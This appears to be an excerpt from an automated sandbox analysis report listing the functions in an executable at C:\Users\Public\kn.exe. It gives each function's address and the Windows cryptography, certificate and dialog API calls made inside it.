Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54FB0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54FB0A0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54BB098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,6_2_00007FF6C54BB098
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552705C BCryptGetProperty,#360,6_2_00007FF6C552705C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F1058 NCryptOpenStorageProvider,#205,#359,#357,6_2_00007FF6C54F1058
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,6_2_00007FF6C551511C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5527124 BCryptGenerateKeyPair,#360,6_2_00007FF6C5527124
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54A9134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,6_2_00007FF6C54A9134
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55270C8 BCryptSetProperty,#360,6_2_00007FF6C55270C8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F10D8 NCryptSetProperty,#205,#359,#357,#359,#357,6_2_00007FF6C54F10D8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F30D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF6C54F30D8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5484F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,6_2_00007FF6C5484F90
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526FAC BCryptOpenAlgorithmProvider,#360,6_2_00007FF6C5526FAC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0FB4 NCryptOpenKey,#205,#359,#357,#357,6_2_00007FF6C54F0FB4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D4F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF6C54D4F50
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,6_2_00007FF6C551EF74
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,6_2_00007FF6C54E0F58
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5467034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,6_2_00007FF6C5467034
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C546302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF6C546302F
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E9028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,6_2_00007FF6C54E9028
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F7020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54F7020
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552700C BCryptEnumAlgorithms,#360,6_2_00007FF6C552700C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F301C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5466A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,6_2_00007FF6C5466A84
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,6_2_00007FF6C54DEA7C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5522A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,6_2_00007FF6C5522A78
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54F8AA0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5492B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,6_2_00007FF6C5492B00
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E8AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF6C54E8AFC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,6_2_00007FF6C54F0ABC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,6_2_00007FF6C54F2AE4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF6C54B29A0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F099C BCryptOpenAlgorithmProvider,#205,#359,#359,6_2_00007FF6C54F099C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5522994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,6_2_00007FF6C5522994
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54F8940
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54FC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54FC940
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF6C547C960
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DAA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,6_2_00007FF6C54DAA00
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D4A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,6_2_00007FF6C54D4A34
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,6_2_00007FF6C54F4A1C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0A18 BCryptSetProperty,#205,#359,#357,#357,6_2_00007FF6C54F0A18
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6C552A9F0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54BE9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,6_2_00007FF6C54BE9F0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,6_2_00007FF6C54F2C80
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5534C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,6_2_00007FF6C5534C80
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54FACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,6_2_00007FF6C54FACAC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526C88 NCryptEnumAlgorithms,#360,6_2_00007FF6C5526C88
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6C54E4CA0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5528C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,6_2_00007FF6C5528C58
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5456C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF6C5456C4C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0C3C NCryptExportKey,#205,#359,#359,#357,6_2_00007FF6C54F0C3C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0D14 NCryptFinalizeKey,#205,#357,#357,6_2_00007FF6C54F0D14
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526D2C NCryptFreeBuffer,#360,6_2_00007FF6C5526D2C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,6_2_00007FF6C54F2CFC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,6_2_00007FF6C54E2CF8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B2D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6C54B2D18
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526CE0 NCryptEnumStorageProviders,#360,6_2_00007FF6C5526CE0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B4CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,6_2_00007FF6C54B4CC0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5548CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,6_2_00007FF6C5548CF4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5520B9C CryptHashData,GetLastError,#357,6_2_00007FF6C5520B9C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,6_2_00007FF6C54F0B80
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,6_2_00007FF6C551CBB4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,6_2_00007FF6C547CB98
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C555EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,6_2_00007FF6C555EB38
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526C30 NCryptOpenStorageProvider,#360,6_2_00007FF6C5526C30
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,6_2_00007FF6C548CC24
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F2BC0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5520BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,6_2_00007FF6C5520BF4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C550D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,6_2_00007FF6C550D6A0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54A76B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6C54A76B0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5519688 CryptFindOIDInfo,#357,#360,#360,#360,6_2_00007FF6C5519688
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F3654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF6C54F3654
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54EF644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54EF644
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,6_2_00007FF6C54C366C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DB664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,6_2_00007FF6C54DB664
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551F650 CryptHashCertificate2,SetLastError,6_2_00007FF6C551F650
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5465664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,6_2_00007FF6C5465664
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,6_2_00007FF6C547D660
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F36E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F36E8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DF6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,6_2_00007FF6C54DF6D8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F3590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F3590
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5529580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,6_2_00007FF6C5529580
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551F570 CryptHashCertificate,SetLastError,6_2_00007FF6C551F570
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54BB55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,6_2_00007FF6C54BB55C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D95FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,6_2_00007FF6C54D95FC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547F630 CryptAcquireContextW,GetLastError,#357,SetLastError,6_2_00007FF6C547F630
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C547D5C2
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B55F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,6_2_00007FF6C54B55F0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55298B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6C55298B0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5487884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,6_2_00007FF6C5487884
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C9878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,6_2_00007FF6C54C9878
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DD850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,6_2_00007FF6C54DD850
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF6C54E184C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F3860
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,6_2_00007FF6C551F918
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54638FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF6C54638FC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5473918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C5473918
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,6_2_00007FF6C54F391C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DB8D0 I_CryptGetLruEntryData,#357,6_2_00007FF6C54DB8D0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C18DC CertFindExtension,CryptDecodeObject,GetLastError,#357,6_2_00007FF6C54C18DC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,6_2_00007FF6C548D790
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C546B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,6_2_00007FF6C546B788
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C577C #360,#358,CryptDecodeObject,GetLastError,#357,6_2_00007FF6C54C577C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F37A4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C550B794 CryptExportPublicKeyInfoEx,SetLastError,6_2_00007FF6C550B794
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54BF774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,6_2_00007FF6C54BF774
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54F5768
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,6_2_00007FF6C551D750
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF6C548F810
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DB808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,6_2_00007FF6C54DB808
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,6_2_00007FF6C551F7FC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54917D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,6_2_00007FF6C54917D4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55097E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,6_2_00007FF6C55097E4
